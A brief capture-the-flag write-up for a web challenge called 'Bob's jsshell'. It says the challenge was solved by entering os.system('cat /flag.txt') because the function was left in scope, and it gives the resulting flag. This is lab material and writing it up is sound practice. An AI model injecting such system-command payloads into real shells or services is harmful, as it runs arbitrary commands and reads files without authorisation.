Tags: web
Rating:
Real exploit involved ROP chains to escalate JIT bugs.
*broke:* looking for old firefox JIT bug CVEs
*woke:* `os.system('cat /flag.txt')`
`os.system()` was in the scope lol, so just input `os.system('cat /flag.txt')` in Bob's jsshell to get flag.
`utflag{d1d_y0u_us3_a_j1t_bug_0r_nah}`